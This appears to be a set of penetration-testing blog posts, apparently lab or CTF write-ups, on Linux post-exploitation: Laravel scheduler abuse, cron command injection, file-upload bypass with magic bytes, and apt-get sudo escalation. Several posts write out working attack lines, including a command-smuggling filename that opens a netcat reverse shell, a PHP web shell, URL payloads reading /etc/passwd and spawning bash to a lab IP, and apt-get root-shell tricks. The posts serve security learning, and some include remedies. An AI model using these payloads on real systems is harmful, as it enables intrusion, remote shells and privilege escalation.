by Vry4n_ | Feb 9, 2020 | Linux Post-Exploitation
Laravel is a web application framework with expressive, elegant syntax.
https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/
https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands
The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You'll manage the task execution definitions in app/Console/Kernel.php
Scheduling Your Command
As was perhaps made obvious by the earlier example, scheduling your command within app/Console/Kernel.php is easy. If you'd like amazon:update to run hourly, you'll use the hourly method
Updating Amazon product information hourly seems a bit aggressive. Fortunately, you have plenty of other options. To run a command on a daily basis (midnight), use daily:
To run it at a specific time, use the dailyAt method:
If you need to run a command very frequently, you can use an every method:
Enabling the Scheduler
With your tasks created and scheduled, you'll need to add a single entry to your server's crontab file:
Execute terminal commands
You can optionally define some logic for execution directly within the schedule method:
Schedule Frequency
Execution
1. I noticed in crontab that there is a task for laravel
2. I modified the file Kernel.php located in app/Console
3. I ran a reverse shell, without & at the end the communication closes. Make sure to use it like that to run in background.
4. Having already a listener in place wait for communication as the Kernel.php is executed every minute
by Vry4n_ | Feb 9, 2020 | Linux Post-Exploitation
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://owasp.org/www-community/attacks/Command_Injection
The cron daemon is a long-running process that executes commands at specific dates and times. For commands that need to be executed repeatedly (e.g., hourly, daily, or weekly), you can use the crontab
Each entry in a crontab file consists of six fields
- minute(s) hour(s) day(s) month(s) weekday(s) command(s)
Field Value Description
minute 0-59 The exact minute that the command sequence executes
hour 0-23 The hour of the day that the command sequence executes
day 1-31 The day of the month that the command sequence executes
month 1-12 The month of the year that the command sequence executes
weekday 0-6 The day of the week that the command sequence executes (Sunday = 0, etc.)
In this example we have a PHP script that is executed by crontab every 3 minutes
What the PHP script does is check files within a directory, scans that most files have a specific format, if there is any anomaly delete some files.
Code analysis
1. This first block of code does the following.
- Requires lib.php to run
- Set the variable $path to set the directory to scan
- Logs will be written to $logpath variable which is /tmp/attack.log
It then set an empty array as $files, does some regular expression on the result of a “scandir()” function that works as Linux “ls”
2. This second block, with the results, for each result in $files, set a key and a value, if the file index.html is detected just ignore it.
3. In this piece of code, we call the function “getnameCheck” that is in lib.php file, if the result of $check is not valid, use the function “file_put_contents” to write a file and the execute some system commands.
lib.php
check_attack.php
We can now try to exploit this code.
Exploitation
1. Now that we know this scripts executes BASH commands when a file doesn’t pass the check. We will create a suspicious file that executes a reverse shell.
- touch -- ‘; nc -c bash 10.10.14.37 4444;.php’
- ls -l
2. Start the listener on Kali/Parrot using netcat
3. Wait for the script to execute and check netcat
Remedy
1. Avoid using PHP system exec functions, and, try to replace them with functions that are PHP embedded
- use “scandir()” instead of exec(“ls”)
2. Sanitize all user input
- Block the use of “;”, “&&”, “|” as an example
by Vry4n_ | Feb 5, 2020 | Linux Post-Exploitation
Magic numbers are the first bits of a file which uniquely identify the type of file. it can be helpful to look for file format signatures and inferring how the application is using them based on these signatures, as well as how these formats may be abused to provoke undefined behavior within the application.
To identify these common file format signatures one typically only need to look as far as the first few bytes of the file in question. This is what’s often called “magic bytes”, a term referring to a block of arcane byte values used to designate a filetype in order for applications to be able to detect whether or not the file they plan to parse and consume is of the proper format.
For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF..... or ffd8 shows that it's a JPEG file.
- file image.jpeg
- file -i image.jpeg
- xxd image.jpeg | head
Magic numbers (File signatures) are typically not visible to the user, but, can be seen by using a hex editor or by using the ‘xxd’ command to read the file
Changing the values raise a flag for malware or potential damage.
Exploiting file upload functionality with this trick
In this scenario we see a basic php file upload. First we test functionality of the application and capture the requests with a proxy.
1. If we just click on upload and select no file it shows “Invalid image file.” Error
In proxy the response doesn’t show much
We uploaded an image file successfully message received “file uploaded, refresh gallery”
Looking at the gallery we confirm the file is stored in the server and accessible to us.
The image is store by photos.php and displayed in /uploads/ it also changes the name “10_10_14_36.jpeg”. It seems IP address + file extension
Exploiting the upload functionality
1. We will try to upload a simple GET php file.
- vi shell.php # We name the file shell.php
- <?php echo shell_exec($_GET[‘cmd’]); ?>
Try to upload it. As a result, we get “invalid image file.” This means the mechanism does somehow file checking.
2. As we have the source code we will determine what is going on in the background. First we search within the files to see what the user can enter
We have there “check_file_type” function. And also it checks if “$_POST[‘submit’]” has been set. We will inspect this upload.php file.
The block of code below may indicate the following
- Check if POST ‘submit’ has been entered, if not empty which means there was a file set the value as the variable $myfile
- If the result of “check_file_type” is false, display “invalid image file.”, the text we were getting
Now I will inspect “check_file_type” function, I need to find which file includes it
This one shows that lib,php contains that function, so, we are reading that file
In this other block of code within lib.php, we found our function “check_file_type”, this function is dependent on “file_mime_type” to return either true or false.
It seems this one piece of code opens the file raw data and checks the content for its type.
Changing file type
So, now we will change the file content to show our script which is ASCII to show as .gif
For this first we need to look at the list of magic bytes, you can search on the internet.
https://en.wikipedia.org/wiki/List_of_file_signatures
In the contents of the site above we see the codes that represent each format.
GIF8 is used for .gif file so we append that to the beginning of the file
- GIF8; <?php echo shell_exec($_GET['cmd']); ?>
- file shell.php
Now we can try to upload the file.
This time we still got blocked and the error message, another mechanism should be verifying the file extension. The error message displayed this time varies a little bit. There is no ending “.”
I found the second verification mechanism within upload.php, if this fails we get “Invalid image file”. There we have the allowed formats jpg, png, gif, jpeg
Now we are changing the file name, and try to upload again:
- mv shell.php shell.php.gif
We got to upload the file successfully
So far we have bypassed the metadata check mechanism and the file name format verification. Now, you need to locate where the server stores the file and execute
In this case this has been saved in /uploads/10_10_14_36.php.gif
Exploiting the system
As our script needs a GET request we use the URL to enter system commands
- http://10.10.10.146/uploads/10_10_14_36.php.gif?cmd=cat /etc/passwd
We now know that the script works now a reverse Shell can be executed
1. Start a listener in Kali/Parrot OS
2. in the browser enter a netcat command
- http://10.10.10.146/uploads/10_10_14_36.php.gif?cmd=nc -e /bin/bash 10.10.14.36 4444
The IP & Port values vary depending on your system IP and Port in use.
Doing this with Burp Suite. Bonus
1. upload the shell.php file we created as it was originally
- file shell.php
- cat shell.php
2. Upload the file and capture the request and response using BurpSuite
The Request uses POST we see it in the screenshot, also, there is the filename and its contents. 
We will modify the value of the variable “filename” and the contents of the file, our mission is the following:
- name the file from shell.php to shell.php.gif
- to insert our magic byte “GIF8” to make it look as a .gif file
The response is the following “file uploaded, refresh gallery”. We didn’t change the file itself it is still being shell.php in our PC, we changed it on the go. We complained with the file being .gif and the file contents were sent as gif (GIF8)
Solution
1. There is no authentication or authorization check to make sure that the user has signed in (authentication) and has access to perform a file upload (authorization).
2. When receiving an upload, you can avoid attackers uploading executable PHP or other code by examining your uploads for content. For example, if you are accepting image uploads, call the PHP getimagesize() function on the uploaded file to determine if it is a valid image.
by Vry4n_ | Dec 24, 2019 | Linux Post-Exploitation
apt-get - Privilege escalation
apt-get can be used to escalate privileges when sudo is allowed without password.
How to
1. check the permissions this user has
We can see that /usr/bin/apt-get is allowed (NOPASSWD)
2. get into changelog documentation
- sudo apt-get changelog apt
3. At the bottom type into change to /bin/bash since this document has been opened as root, seems to be “less” Linux utility.
After that you immediately change to root log in.
Using apt-get & apt update for privilege escalation
(For this to work the target package (e.g., sl) must not be installed.)
- TF=$(mktemp)
- echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
- sudo apt-get install -c $TF sl
How to
1. Having NOPASSWD rights
- sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
- whoami
If you type exit the apt-get update command starts to do its job.
2. using apt
- sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash
For using either apt or apt-get you need sudo access.
sudo -l
